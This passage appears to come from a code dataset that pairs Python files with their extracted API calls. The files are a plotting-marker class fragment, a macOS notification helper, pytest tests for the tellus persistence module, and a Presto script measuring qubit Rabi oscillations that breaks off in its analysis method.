        diffy = np.abs(self.current_lims[dimy] - xylims[dimy]) / dy
        diff = diffx.sum() + diffy.sum()
        # Only resample image if the changes in axes limits are large enough to
        # avoid too many updates while panning.
        if diff > 0.1:
            self.current_lims.update(xylims)
            self.controller.update_data(slices=self.current_limits)
        # If we are zooming, rescale to data?
        # TODO This will trigger a second call to view.refresh and thus
        # self.update_data. Why does the controller have to call refresh
        # to make view.rescale_to_data take effect?
        if self.figure.rescale_on_zoom():
            self.controller.rescale_to_data()
    @property
    def current_limits(self):
        """
        Current viewport limits per dimension, as scipp scalars carrying
        the coordinate's unit: {dim: [low, high]}.
        """
        limits = {}
        for dim in self.dims:
            low, high = self.current_lims[dim]
            unit = self._data.coords[dim].unit
            limits[dim] = [scalar(low, unit=unit), scalar(high, unit=unit)]
        return limits
    @property
    def global_limits(self):
        """
        Full data-extent limits per dimension, as scipp scalars carrying
        the coordinate's unit: {dim: [low, high]}.
        """
        limits = {}
        for dim in self.dims:
            low, high = self.global_lims[dim]
            unit = self._data.coords[dim].unit
            limits[dim] = [scalar(low, unit=unit), scalar(high, unit=unit)]
        return limits
    def _update_axes(self):
        """
        Update the current and global axes limits, before updating the figure
        axes.
        """
        super()._update_axes()
        # Axes changed, so any picked profile markers are now stale
        self.clear_marks()
    def clear_marks(self):
        """
        Reset all scatter markers when a profile is reset.
        """
        if self._marks_scatter is not None:
            self._marks_scatter = None
            # NOTE(review): assigning to ax.collections is deprecated in
            # newer matplotlib releases -- verify against the pinned version
            self.figure.ax.collections = []
            self.figure.draw()
    def _do_handle_pick(self, event):
        """
        Return the index of the picked scatter point, None if something else
        is picked.
        """
        if isinstance(event.artist, PathCollection):
            # event.ind lists picked points; take the first one
            return self._marker_index[event.ind[0]]
    def _do_mark(self, index, color, x, y):
        """
        Add a marker (colored scatter point).
        """
        if self._marks_scatter is None:
            # First marker: create the scatter collection (picker=5 makes
            # the points clickable within a 5-point tolerance)
            self._marks_scatter = self.figure.ax.scatter([x], [y],
                                                         c=[color],
                                                         edgecolors="w",
                                                         picker=5,
                                                         zorder=10)
        else:
            # Append the new point and its color to the existing collection
            new_offsets = np.concatenate((self._marks_scatter.get_offsets(), [[x, y]]),
                                         axis=0)
            new_colors = np.concatenate((self._marks_scatter.get_facecolors(), [color]),
                                        axis=0)
            self._marks_scatter.set_offsets(new_offsets)
            self._marks_scatter.set_facecolors(new_colors)
        self._marker_index.append(index)
        self.figure.draw()
    def remove_mark(self, index):
        """
        Remove a marker (scatter point).
        """
        # Map the external index to the position within the collection
        i = self._marker_index.index(index)
        xy = np.delete(self._marks_scatter.get_offsets(), i, axis=0)
        c = np.delete(self._marks_scatter.get_facecolors(), i, axis=0)
        self._marks_scatter.set_offsets(xy)
        self._marks_scatter.set_facecolors(c)
        self._marker_index.remove(index)
        self.figure.draw()
|
[
"numpy.array",
"numpy.abs"
] |
[((3143, 3206), 'numpy.abs', 'np.abs', (['(self.current_lims[dimx][1] - self.current_lims[dimx][0])'], {}), '(self.current_lims[dimx][1] - self.current_lims[dimx][0])\n', (3149, 3206), True, 'import numpy as np\n'), ((3220, 3283), 'numpy.abs', 'np.abs', (['(self.current_lims[dimy][1] - self.current_lims[dimy][0])'], {}), '(self.current_lims[dimy][1] - self.current_lims[dimy][0])\n', (3226, 3283), True, 'import numpy as np\n'), ((3300, 3346), 'numpy.abs', 'np.abs', (['(self.current_lims[dimx] - xylims[dimx])'], {}), '(self.current_lims[dimx] - xylims[dimx])\n', (3306, 3346), True, 'import numpy as np\n'), ((3368, 3414), 'numpy.abs', 'np.abs', (['(self.current_lims[dimy] - xylims[dimy])'], {}), '(self.current_lims[dimy] - xylims[dimy])\n', (3374, 3414), True, 'import numpy as np\n'), ((1610, 1676), 'numpy.array', 'np.array', (['[self.current_lims[dims[1]], self.current_lims[dims[0]]]'], {}), '([self.current_lims[dims[1]], self.current_lims[dims[0]]])\n', (1618, 1676), True, 'import numpy as np\n')]
|
import Foundation
import objc
import AppKit
import sys
# Resolve the Objective-C notification classes once at import time.
NSUserNotificationCenter = objc.lookUpClass('NSUserNotificationCenter')
NSUserNotification = objc.lookUpClass('NSUserNotification')
def notify(title, subtitle, info_text, delay=0, sound=False, userInfo=None):
    """Schedule a macOS user notification via NSUserNotificationCenter.

    Args:
        title, subtitle, info_text: text shown in the notification banner.
        delay: seconds from now until delivery (0 = deliver immediately).
        sound: if True, play the default notification sound on delivery.
        userInfo: optional dict attached to the notification (available in
            delegate callbacks).

    Fix: the original declared a mutable default argument (``userInfo={}``),
    which is shared across calls; use a ``None`` sentinel instead.
    """
    if userInfo is None:
        userInfo = {}
    notification = NSUserNotification.alloc().init()
    notification.setTitle_(title)
    notification.setSubtitle_(subtitle)
    notification.setInformativeText_(info_text)
    notification.setUserInfo_(userInfo)
    notification.setHasActionButton_(True)
    notification.setActionButtonTitle_('Action!!')
    notification.setHasReplyButton_(True)
    if sound:
        notification.setSoundName_("NSUserNotificationDefaultSoundName")
    # Deliver `delay` seconds after "now".
    notification.setDeliveryDate_(Foundation.NSDate.dateWithTimeInterval_sinceDate_(delay, Foundation.NSDate.date()))
    NSUserNotificationCenter.defaultUserNotificationCenter().scheduleNotification_(notification)
|
[
"objc.lookUpClass",
"Foundation.NSDate.date"
] |
[((83, 127), 'objc.lookUpClass', 'objc.lookUpClass', (['"""NSUserNotificationCenter"""'], {}), "('NSUserNotificationCenter')\n", (99, 127), False, 'import objc\n'), ((149, 187), 'objc.lookUpClass', 'objc.lookUpClass', (['"""NSUserNotification"""'], {}), "('NSUserNotification')\n", (165, 187), False, 'import objc\n'), ((793, 817), 'Foundation.NSDate.date', 'Foundation.NSDate.date', ([], {}), '()\n', (815, 817), False, 'import Foundation\n')]
|
import json
import pathlib
import datetime as dt
from io import StringIO
import jsonpickle
import pytest
from tellus import __version__
from tellus.configuration import TELLUS_GO, TELLUS_INTERNAL
from tellus.persistence import (
PickleFilePersistor,
TELLUS_SAVE_DIR,
PersistenceSetupException,
PERSISTOR_HEADER_KEY,
PERSISTOR_HEADER_VERSION,
PERSISTOR_HEADER_SAVED,
PERSISTOR_HEADER_SAVE_COUNTS,
)
from tellus.persistable import ZAuditInfo, Persistable
# pylint: disable=unused-argument
# pylint gets cranky about the fake file system fixtures
from tellus.tell import Tell
TELLUS_PICKLE_SAVE_FILE_NO_HEADER = """{"_alias": "tellus", "_categories": {"py/reduce": [{"py/type": "sortedcontainers.sortedset.SortedSet"}, {"py/tuple": [{"py/set": ["tellus-go"]}, null]}]}, "_go_url": "/tellus", "_tags": {"py/reduce": [{"py/type": "sortedcontainers.sortedset.SortedSet"}, {"py/tuple": [{"py/set": []}, null]}]}, "py/object": "tellus.tells.Tell"}
{"_alias": "vfh", "_categories": {"py/reduce": [{"py/type": "sortedcontainers.sortedset.SortedSet"}, {"py/tuple": [{"py/set": ["tellus-go"]}, null]}]}, "_go_url": "http://veryfinehat.com", "_tags": {"py/reduce": [{"py/type": "sortedcontainers.sortedset.SortedSet"}, {"py/tuple": [{"py/set": []}, null]}]}, "py/object": "tellus.tells.Tell"}
{"_alias": "a", "_categories": {"py/reduce": [{"py/type": "sortedcontainers.sortedset.SortedSet"}, {"py/tuple": [{"py/set": ["tellus-go"]}, null]}]}, "_go_url": "BORKED", "_tags": {"py/reduce": [{"py/type": "sortedcontainers.sortedset.SortedSet"}, {"py/tuple": [{"py/set": []}, null]}]}, "py/object": "tellus.tells.Tell"}"""
TELLUS_PICKLE_SAVE_FILE_WITH_EARLIER_HEADER = f"""{{"persistor": "PickleFilePersistor","tellus-version": "{__version__}"}}
{TELLUS_PICKLE_SAVE_FILE_NO_HEADER}
"""
PERSISTENCE_DATA = ""
PERSISTENCE_TEST_USER = "persistenceTest"
def create_current_save_file():
    """Build and return the text of a valid, current-format save file."""
    tells = [
        Tell("tellus", go_url="/tellus", category=TELLUS_GO),
        Tell("vfh", go_url="http://veryfinehat.com", category=TELLUS_GO),
        Tell("quislet", category=TELLUS_INTERNAL),
    ]
    out = StringIO()
    pickler = PickleFilePersistor(
        persist_root=None, save_file_name="current_pickle", testing=True,
    )
    pickler.write_save_file(out, tells)
    return out.getvalue()
class MiniPersistable(Persistable):
    """Minimal Persistable carrying an arbitrary payload; used as a fixture."""

    def __init__(self, values=None):
        super().__init__(PERSISTENCE_TEST_USER)
        self.values = values

    def to_json_pickle(self):
        # Serialize the entire object through jsonpickle.
        return jsonpickle.encode(self)

    def __eq__(self, other):
        # Equal iff same class and identical attribute dictionaries.
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self.__eq__(other)
class MiniHolder(object):
    """Accumulates decoded objects fed to its load_me callback."""

    def __init__(self):
        self.persistables = []

    def load_me(self, load_string):
        # Decode one jsonpickle line and keep the resulting object.
        decoded = jsonpickle.decode(load_string)
        self.persistables.append(decoded)
def test_persist_no_root(fs):
    """With no persist_root, the save file lands under cwd/TELLUS_SAVE_DIR."""
    expected = pathlib.Path.cwd() / TELLUS_SAVE_DIR / "test"
    subject = PickleFilePersistor(persist_root=None, save_file_name="test")
    assert subject.persistence_file() == expected
def test_persistence_file_name(fs):
    """Creating a Persistor without a save file name must raise.

    Uses the idiomatic ``pytest.raises`` context manager instead of the
    try / ``pytest.fail`` / except pattern.
    """
    with pytest.raises(PersistenceSetupException):
        PickleFilePersistor(persist_root=None, save_file_name=None)
def test_verify_save_file(fs):
    """verify_save_file parses current and legacy headers correctly.

    Three cases: a freshly-written file (full 4-field header), a file with an
    earlier 2-field header, and a headerless legacy file (header is None and
    the file pointer is rewound so the caller can re-read from the start).
    """
    # Case 1: file written by the current persistor has the full header.
    persistor = PickleFilePersistor(
        persist_root=None, save_file_name="current_pickle", testing=True,
    )
    buffer = StringIO()
    persistor.write_save_file(buffer, [MiniPersistable()])
    header = PickleFilePersistor.verify_save_file(StringIO(buffer.getvalue()))
    assert len(header) == 4
    assert header[PERSISTOR_HEADER_KEY] == "PickleFilePersistor"
    assert header[PERSISTOR_HEADER_VERSION] == f"{__version__}"
    assert header[PERSISTOR_HEADER_SAVED] is not None
    assert header[PERSISTOR_HEADER_SAVE_COUNTS] == 1
    assert buffer.tell() > 0
    # Case 2: earlier header format — only persistor name and version.
    fs.create_file(
        "earlier_pickle", contents=TELLUS_PICKLE_SAVE_FILE_WITH_EARLIER_HEADER
    )
    with open("earlier_pickle", "r") as save_file:
        header = PickleFilePersistor.verify_save_file(save_file)
        assert header == {
            "persistor": "PickleFilePersistor",
            "tellus-version": f"{__version__}",
        }
        assert save_file.tell() > 0
    # Case 3: legacy file with no header at all.
    fs.create_file("old_pickle", contents=TELLUS_PICKLE_SAVE_FILE_NO_HEADER)
    with open("old_pickle", "r") as save_file:
        header = PickleFilePersistor.verify_save_file(save_file)
        assert header is None
        assert save_file.tell() == 0, "This case should reset the file pointer."
def test_pickle_persistence(fs):
    """A single persisted item survives a save/load round trip."""
    original = MiniPersistable({"test-key": "test-value"})
    persistor = PickleFilePersistor(
        persist_root="/test-location", save_file_name="test-file.txt"
    )
    persistor.persist([original])
    holder = MiniHolder()
    persistor.load(holder.load_me)
    assert len(holder.persistables) == 1, "Should have loaded our one test value"
    reloaded = holder.persistables[0]
    assert (
        original.to_json_pickle() == reloaded.to_json_pickle()
    ), "Our loaded value should equal our existing persistable."
def test_pickle_persistence_cycle(fs):
    """Several persisted items reload equal to the originals, in order.

    Fix: the original zip loop reused the name ``loaded`` for the loop
    variable, shadowing the ``loaded`` list it was iterating — confusing and
    bug-prone; the loop variable is now ``reloaded``.
    """
    persistor = PickleFilePersistor(
        persist_root="/test-location", save_file_name="test-file.txt"
    )
    items_to_persist = [
        MiniPersistable({"test-key1": "test-value1"}),
        MiniPersistable({"test-key2": "test-value2"}),
        MiniPersistable({"test-key3": "test-value3"}),
    ]
    persistor.persist(items_to_persist)
    hodor = MiniHolder()
    persistor.load(hodor.load_me)
    loaded = hodor.persistables
    assert len(loaded) == len(items_to_persist)
    for persisted, reloaded in zip(items_to_persist, loaded):
        assert (
            persisted == reloaded
        ), f"{persisted.to_json_pickle()} should equal {reloaded.to_json_pickle()}"
def test_audit_info():
    """A fresh ZAuditInfo records its creator and coherent timestamps."""
    user = "rjbrande"
    now = dt.datetime.now(dt.timezone.utc)
    audit_info = ZAuditInfo(user)
    assert audit_info.created_by == user
    assert audit_info.last_modified_by == user
    # The ISO string and the datetime view must agree.
    assert dt.datetime.fromisoformat(audit_info.created) == audit_info.created_datetime
    assert (
        audit_info.last_modified == audit_info.created
    ), "Initially, last_modified should == created"
    elapsed = audit_info.created_datetime - now
    assert elapsed.seconds < 1, "created_datetime should roughly be 'now'"
def test_audit_to_simple_dict_and_json():
    """to_simple_data_dict / to_simple_json reflect creator and last modifier."""
    audit_info = ZAuditInfo("saturngirl")
    audit_info.modified("cosmicboy")
    as_dict = audit_info.to_simple_data_dict()
    expectations = {
        "created_by": "saturngirl",
        "last_modified_by": "cosmicboy",
        "created": audit_info.created,
        "last_modified": audit_info.last_modified,
    }
    for key, expected in expectations.items():
        assert as_dict[key] == expected
    # The JSON form is just the dict form serialized.
    assert json.dumps(as_dict) == audit_info.to_simple_json()
|
[
"io.StringIO",
"tellus.persistable.ZAuditInfo",
"datetime.datetime.fromisoformat",
"tellus.persistence.PickleFilePersistor.verify_save_file",
"pytest.fail",
"json.dumps",
"jsonpickle.decode",
"tellus.persistence.PickleFilePersistor",
"tellus.tell.Tell",
"pathlib.Path.cwd",
"datetime.datetime.now",
"jsonpickle.encode"
] |
[((2030, 2119), 'tellus.persistence.PickleFilePersistor', 'PickleFilePersistor', ([], {'persist_root': 'None', 'save_file_name': '"""current_pickle"""', 'testing': '(True)'}), "(persist_root=None, save_file_name='current_pickle',\n testing=True)\n", (2049, 2119), False, 'from tellus.persistence import PickleFilePersistor, TELLUS_SAVE_DIR, PersistenceSetupException, PERSISTOR_HEADER_KEY, PERSISTOR_HEADER_VERSION, PERSISTOR_HEADER_SAVED, PERSISTOR_HEADER_SAVE_COUNTS\n'), ((2144, 2154), 'io.StringIO', 'StringIO', ([], {}), '()\n', (2152, 2154), False, 'from io import StringIO\n'), ((3147, 3208), 'tellus.persistence.PickleFilePersistor', 'PickleFilePersistor', ([], {'persist_root': 'None', 'save_file_name': '"""test"""'}), "(persist_root=None, save_file_name='test')\n", (3166, 3208), False, 'from tellus.persistence import PickleFilePersistor, TELLUS_SAVE_DIR, PersistenceSetupException, PERSISTOR_HEADER_KEY, PERSISTOR_HEADER_VERSION, PERSISTOR_HEADER_SAVED, PERSISTOR_HEADER_SAVE_COUNTS\n'), ((3628, 3717), 'tellus.persistence.PickleFilePersistor', 'PickleFilePersistor', ([], {'persist_root': 'None', 'save_file_name': '"""current_pickle"""', 'testing': '(True)'}), "(persist_root=None, save_file_name='current_pickle',\n testing=True)\n", (3647, 3717), False, 'from tellus.persistence import PickleFilePersistor, TELLUS_SAVE_DIR, PersistenceSetupException, PERSISTOR_HEADER_KEY, PERSISTOR_HEADER_VERSION, PERSISTOR_HEADER_SAVED, PERSISTOR_HEADER_SAVE_COUNTS\n'), ((3742, 3752), 'io.StringIO', 'StringIO', ([], {}), '()\n', (3750, 3752), False, 'from io import StringIO\n'), ((4927, 5014), 'tellus.persistence.PickleFilePersistor', 'PickleFilePersistor', ([], {'persist_root': '"""/test-location"""', 'save_file_name': '"""test-file.txt"""'}), "(persist_root='/test-location', save_file_name=\n 'test-file.txt')\n", (4946, 5014), False, 'from tellus.persistence import PickleFilePersistor, TELLUS_SAVE_DIR, PersistenceSetupException, PERSISTOR_HEADER_KEY, PERSISTOR_HEADER_VERSION, 
PERSISTOR_HEADER_SAVED, PERSISTOR_HEADER_SAVE_COUNTS\n'), ((5555, 5642), 'tellus.persistence.PickleFilePersistor', 'PickleFilePersistor', ([], {'persist_root': '"""/test-location"""', 'save_file_name': '"""test-file.txt"""'}), "(persist_root='/test-location', save_file_name=\n 'test-file.txt')\n", (5574, 5642), False, 'from tellus.persistence import PickleFilePersistor, TELLUS_SAVE_DIR, PersistenceSetupException, PERSISTOR_HEADER_KEY, PERSISTOR_HEADER_VERSION, PERSISTOR_HEADER_SAVED, PERSISTOR_HEADER_SAVE_COUNTS\n'), ((6277, 6309), 'datetime.datetime.now', 'dt.datetime.now', (['dt.timezone.utc'], {}), '(dt.timezone.utc)\n', (6292, 6309), True, 'import datetime as dt\n'), ((6327, 6349), 'tellus.persistable.ZAuditInfo', 'ZAuditInfo', (['"""rjbrande"""'], {}), "('rjbrande')\n", (6337, 6349), False, 'from tellus.persistable import ZAuditInfo, Persistable\n'), ((6826, 6850), 'tellus.persistable.ZAuditInfo', 'ZAuditInfo', (['"""saturngirl"""'], {}), "('saturngirl')\n", (6836, 6850), False, 'from tellus.persistable import ZAuditInfo, Persistable\n'), ((2656, 2679), 'jsonpickle.encode', 'jsonpickle.encode', (['self'], {}), '(self)\n', (2673, 2679), False, 'import jsonpickle\n'), ((3354, 3413), 'tellus.persistence.PickleFilePersistor', 'PickleFilePersistor', ([], {'persist_root': 'None', 'save_file_name': 'None'}), '(persist_root=None, save_file_name=None)\n', (3373, 3413), False, 'from tellus.persistence import PickleFilePersistor, TELLUS_SAVE_DIR, PersistenceSetupException, PERSISTOR_HEADER_KEY, PERSISTOR_HEADER_VERSION, PERSISTOR_HEADER_SAVED, PERSISTOR_HEADER_SAVE_COUNTS\n'), ((3422, 3507), 'pytest.fail', 'pytest.fail', (['"""Creating a Persistor with no file name should throw an exception."""'], {}), "('Creating a Persistor with no file name should throw an exception.'\n )\n", (3433, 3507), False, 'import pytest\n'), ((4358, 4405), 'tellus.persistence.PickleFilePersistor.verify_save_file', 'PickleFilePersistor.verify_save_file', (['save_file'], {}), '(save_file)\n', 
(4394, 4405), False, 'from tellus.persistence import PickleFilePersistor, TELLUS_SAVE_DIR, PersistenceSetupException, PERSISTOR_HEADER_KEY, PERSISTOR_HEADER_VERSION, PERSISTOR_HEADER_SAVED, PERSISTOR_HEADER_SAVE_COUNTS\n'), ((4717, 4764), 'tellus.persistence.PickleFilePersistor.verify_save_file', 'PickleFilePersistor.verify_save_file', (['save_file'], {}), '(save_file)\n', (4753, 4764), False, 'from tellus.persistence import PickleFilePersistor, TELLUS_SAVE_DIR, PersistenceSetupException, PERSISTOR_HEADER_KEY, PERSISTOR_HEADER_VERSION, PERSISTOR_HEADER_SAVED, PERSISTOR_HEADER_SAVE_COUNTS\n'), ((6403, 6448), 'datetime.datetime.fromisoformat', 'dt.datetime.fromisoformat', (['audit_info.created'], {}), '(audit_info.created)\n', (6428, 6448), True, 'import datetime as dt\n'), ((7177, 7198), 'json.dumps', 'json.dumps', (['test_dict'], {}), '(test_dict)\n', (7187, 7198), False, 'import json\n'), ((2224, 2276), 'tellus.tell.Tell', 'Tell', (['"""tellus"""'], {'go_url': '"""/tellus"""', 'category': 'TELLUS_GO'}), "('tellus', go_url='/tellus', category=TELLUS_GO)\n", (2228, 2276), False, 'from tellus.tell import Tell\n'), ((2290, 2354), 'tellus.tell.Tell', 'Tell', (['"""vfh"""'], {'go_url': '"""http://veryfinehat.com"""', 'category': 'TELLUS_GO'}), "('vfh', go_url='http://veryfinehat.com', category=TELLUS_GO)\n", (2294, 2354), False, 'from tellus.tell import Tell\n'), ((2368, 2409), 'tellus.tell.Tell', 'Tell', (['"""quislet"""'], {'category': 'TELLUS_INTERNAL'}), "('quislet', category=TELLUS_INTERNAL)\n", (2372, 2409), False, 'from tellus.tell import Tell\n'), ((3067, 3097), 'jsonpickle.decode', 'jsonpickle.decode', (['load_string'], {}), '(load_string)\n', (3084, 3097), False, 'import jsonpickle\n'), ((3253, 3271), 'pathlib.Path.cwd', 'pathlib.Path.cwd', ([], {}), '()\n', (3269, 3271), False, 'import pathlib\n')]
|
# -*- coding: utf-8 -*-
"""
Measure Rabi oscillation by changing the amplitude of the control pulse.
The control pulse has a sin^2 envelope, while the readout pulse is square.
"""
import ast
import math
import os
import time
import h5py
import numpy as np
from numpy.typing import ArrayLike
from mla_server import set_dc_bias
from presto.hardware import AdcFSample, AdcMode, DacFSample, DacMode
from presto import pulsed
from presto.utils import get_sourcecode, sin2
class RabiAmp:
    """Measure Rabi oscillations by sweeping the control-pulse amplitude.

    The control pulse has a sin^2 envelope while the readout pulse is square.
    ``run`` programs and executes the sequence on the Presto instrument and
    fills ``t_arr`` / ``store_arr``; ``save`` / ``load`` persist the
    experiment to HDF5; ``analyze`` fits the Rabi period and plots.
    """

    def __init__(
        self,
        readout_freq: float,
        control_freq: float,
        readout_port: int,
        control_port: int,
        readout_amp: float,
        readout_duration: float,
        control_duration: float,
        sample_duration: float,
        sample_port: int,
        control_amp_arr: ArrayLike,
        wait_delay: float,
        readout_sample_delay: float,
        num_averages: int,
        jpa_params=None,
    ):
        self.readout_freq = readout_freq
        self.control_freq = control_freq
        self.readout_port = readout_port
        self.control_port = control_port
        self.readout_amp = readout_amp
        self.readout_duration = readout_duration
        self.control_duration = control_duration
        self.sample_duration = sample_duration
        self.sample_port = sample_port
        self.control_amp_arr = control_amp_arr
        self.wait_delay = wait_delay
        self.readout_sample_delay = readout_sample_delay
        self.num_averages = num_averages
        self.rabi_n = len(control_amp_arr)  # one sweep point per amplitude
        self.t_arr = None  # replaced by run
        self.store_arr = None  # replaced by run
        self.jpa_params = jpa_params

    def run(
        self,
        presto_address,
        presto_port=None,
        ext_ref_clk=False,
    ):
        """Execute the amplitude sweep on the instrument and save the result.

        Returns the path of the HDF5 file written by ``save``.
        """
        # Instantiate interface class
        with pulsed.Pulsed(
                address=presto_address,
                port=presto_port,
                ext_ref_clk=ext_ref_clk,
                adc_mode=AdcMode.Mixed,
                adc_fsample=AdcFSample.G2,
                dac_mode=[DacMode.Mixed42, DacMode.Mixed02, DacMode.Mixed02, DacMode.Mixed02],
                dac_fsample=[DacFSample.G10, DacFSample.G6, DacFSample.G6, DacFSample.G6],
        ) as pls:
            pls.hardware.set_adc_attenuation(self.sample_port, 0.0)
            pls.hardware.set_dac_current(self.readout_port, 32_000)
            pls.hardware.set_dac_current(self.control_port, 32_000)
            pls.hardware.set_inv_sinc(self.readout_port, 0)
            pls.hardware.set_inv_sinc(self.control_port, 0)
            pls.hardware.configure_mixer(
                freq=self.readout_freq,
                in_ports=self.sample_port,
                out_ports=self.readout_port,
                sync=False,  # sync in next call
            )
            pls.hardware.configure_mixer(
                freq=self.control_freq,
                out_ports=self.control_port,
                sync=True,  # sync here
            )
            if self.jpa_params is not None:
                # Optional JPA pump and bias for parametric amplification.
                pls.hardware.set_lmx(self.jpa_params['jpa_pump_freq'], self.jpa_params['jpa_pump_pwr'])
                set_dc_bias(self.jpa_params['jpa_bias_port'], self.jpa_params['jpa_bias'])
                time.sleep(1.0)
            # ************************************
            # *** Setup measurement parameters ***
            # ************************************
            # Setup lookup tables for frequencies
            pls.setup_freq_lut(
                output_ports=self.readout_port,
                group=0,
                frequencies=0.0,
                phases=0.0,
                phases_q=0.0,
            )
            pls.setup_freq_lut(
                output_ports=self.control_port,
                group=0,
                frequencies=0.0,
                phases=0.0,
                phases_q=0.0,
            )
            # Setup lookup tables for amplitudes
            pls.setup_scale_lut(
                output_ports=self.readout_port,
                group=0,
                scales=self.readout_amp,
            )
            pls.setup_scale_lut(
                output_ports=self.control_port,
                group=0,
                scales=self.control_amp_arr,
            )
            # Setup readout and control pulses
            # use setup_long_drive to create a pulse with square envelope
            # setup_long_drive supports smooth rise and fall transitions for the pulse,
            # but we keep it simple here
            readout_pulse = pls.setup_long_drive(
                output_port=self.readout_port,
                group=0,
                duration=self.readout_duration,
                amplitude=1.0,
                amplitude_q=1.0,
                rise_time=0e-9,
                fall_time=0e-9,
            )
            # For the control pulse we create a sine-squared envelope,
            # and use setup_template to use the user-defined envelope
            control_ns = int(round(self.control_duration *
                                   pls.get_fs("dac")))  # number of samples in the control template
            control_envelope = sin2(control_ns)
            control_pulse = pls.setup_template(
                output_port=self.control_port,
                group=0,
                template=control_envelope,
                template_q=control_envelope,
                envelope=True,
            )
            # Setup sampling window
            pls.set_store_ports(self.sample_port)
            pls.set_store_duration(self.sample_duration)
            # ******************************
            # *** Program pulse sequence ***
            # ******************************
            T = 0.0  # s, start at time zero ...
            # Control pulse
            pls.reset_phase(T, self.control_port)
            pls.output_pulse(T, control_pulse)
            # Readout pulse starts right after control pulse
            T += self.control_duration
            pls.reset_phase(T, self.readout_port)
            pls.output_pulse(T, readout_pulse)
            # Sampling window
            pls.store(T + self.readout_sample_delay)
            # Move to next Rabi amplitude
            T += self.readout_duration
            pls.next_scale(T, self.control_port)  # every iteration will have a different amplitude
            # Wait for decay
            T += self.wait_delay
            # **************************
            # *** Run the experiment ***
            # **************************
            # repeat the whole sequence `rabi_n` times
            # then average `num_averages` times
            pls.run(
                period=T,
                repeat_count=self.rabi_n,
                num_averages=self.num_averages,
                print_time=True,
            )
            t_arr, (data_I, data_Q) = pls.get_store_data()
            if self.jpa_params is not None:
                # Switch the JPA pump and bias back off.
                pls.hardware.set_lmx(0.0, 0.0)
                set_dc_bias(self.jpa_params['jpa_bias_port'], 0.0)
        self.t_arr = t_arr
        self.store_arr = data_I + 1j * data_Q
        return self.save()

    def save(self, save_filename=None):
        """Save all public attributes and the measured arrays to HDF5.

        If `save_filename` is None, a timestamped file under ./data next to
        this script is created. Returns the full save path.
        """
        # *************************
        # *** Save data to HDF5 ***
        # *************************
        if save_filename is None:
            script_path = os.path.realpath(__file__)  # full path of current script
            current_dir, script_basename = os.path.split(script_path)
            script_filename = os.path.splitext(script_basename)[0]  # name of current script
            timestamp = time.strftime("%Y%m%d_%H%M%S", time.localtime())  # current date and time
            save_basename = f"{script_filename:s}_{timestamp:s}.h5"  # name of save file
            save_path = os.path.join(current_dir, "data", save_basename)  # full path of save file
        else:
            save_path = os.path.realpath(save_filename)
        source_code = get_sourcecode(__file__)  # save also the sourcecode of the script for future reference
        with h5py.File(save_path, "w") as h5f:
            dt = h5py.string_dtype(encoding='utf-8')
            ds = h5f.create_dataset("source_code", (len(source_code), ), dt)
            for ii, line in enumerate(source_code):
                ds[ii] = line
            # Scalars go into attrs, arrays into datasets; jpa_params (a
            # dict or None) is stringified so it fits in an attribute.
            for attribute in self.__dict__:
                print(f"{attribute}: {self.__dict__[attribute]}")
                if attribute.startswith("_"):
                    # don't save private attributes
                    continue
                if attribute == "jpa_params":
                    h5f.attrs[attribute] = str(self.__dict__[attribute])
                elif np.isscalar(self.__dict__[attribute]):
                    h5f.attrs[attribute] = self.__dict__[attribute]
                else:
                    h5f.create_dataset(attribute, data=self.__dict__[attribute])
        print(f"Data saved to: {save_path}")
        return save_path

    @classmethod
    def load(cls, load_filename):
        """Reconstruct a RabiAmp instance from a file written by ``save``."""
        with h5py.File(load_filename, "r") as h5f:
            num_averages = h5f.attrs["num_averages"]
            control_freq = h5f.attrs["control_freq"]
            readout_freq = h5f.attrs["readout_freq"]
            readout_duration = h5f.attrs["readout_duration"]
            control_duration = h5f.attrs["control_duration"]
            readout_amp = h5f.attrs["readout_amp"]
            sample_duration = h5f.attrs["sample_duration"]
            # rabi_n = h5f.attrs["rabi_n"]
            wait_delay = h5f.attrs["wait_delay"]
            readout_sample_delay = h5f.attrs["readout_sample_delay"]
            control_amp_arr = h5f["control_amp_arr"][()]
            t_arr = h5f["t_arr"][()]
            store_arr = h5f["store_arr"][()]
            # source_code = h5f["source_code"][()]
            # these were added later; default to 0 / None for old files
            try:
                readout_port = h5f.attrs["readout_port"]
            except KeyError:
                readout_port = 0
            try:
                control_port = h5f.attrs["control_port"]
            except KeyError:
                control_port = 0
            try:
                sample_port = h5f.attrs["sample_port"]
            except KeyError:
                sample_port = 0
            try:
                jpa_params = ast.literal_eval(h5f.attrs["jpa_params"])
            except KeyError:
                jpa_params = None
        self = cls(
            readout_freq,
            control_freq,
            readout_port,
            control_port,
            readout_amp,
            readout_duration,
            control_duration,
            sample_duration,
            sample_port,
            control_amp_arr,
            wait_delay,
            readout_sample_delay,
            num_averages,
            jpa_params,
        )
        self.control_amp_arr = control_amp_arr
        self.t_arr = t_arr
        self.store_arr = store_arr
        return self

    def analyze(self, all_plots=False):
        """Fit the Rabi oscillation and plot the result.

        Averages the stored trace over a fixed time window, rotates the IQ
        data onto the I quadrature, fits a damped cosine, and prints the
        tau / pi / pi-half pulse amplitudes. Returns the list of figures.
        Raises RuntimeError if ``run`` (or ``load``) has not populated the
        data arrays yet.
        """
        if self.t_arr is None:
            raise RuntimeError
        if self.store_arr is None:
            raise RuntimeError
        import matplotlib.pyplot as plt
        from presto.utils import rotate_opt
        ret_fig = []
        # Integration window within the sampled trace.
        t_low = 1500 * 1e-9
        t_high = 2000 * 1e-9
        # t_span = t_high - t_low
        idx_low = np.argmin(np.abs(self.t_arr - t_low))
        idx_high = np.argmin(np.abs(self.t_arr - t_high))
        idx = np.arange(idx_low, idx_high)
        # nr_samples = len(idx)
        if all_plots:
            # Plot raw store data for first iteration as a check
            fig1, ax1 = plt.subplots(2, 1, sharex=True, tight_layout=True)
            ax11, ax12 = ax1
            ax11.axvspan(1e9 * t_low, 1e9 * t_high, facecolor="#dfdfdf")
            ax12.axvspan(1e9 * t_low, 1e9 * t_high, facecolor="#dfdfdf")
            ax11.plot(1e9 * self.t_arr, np.abs(self.store_arr[0, 0, :]))
            ax12.plot(1e9 * self.t_arr, np.angle(self.store_arr[0, 0, :]))
            ax12.set_xlabel("Time [ns]")
            fig1.show()
            ret_fig.append(fig1)
        # Analyze Rabi
        resp_arr = np.mean(self.store_arr[:, 0, idx], axis=-1)
        data = rotate_opt(resp_arr)
        # Fit data
        popt_x, perr_x = _fit_period(self.control_amp_arr, np.real(data))
        period = popt_x[3]
        period_err = perr_x[3]
        pi_amp = period / 2
        pi_2_amp = period / 4
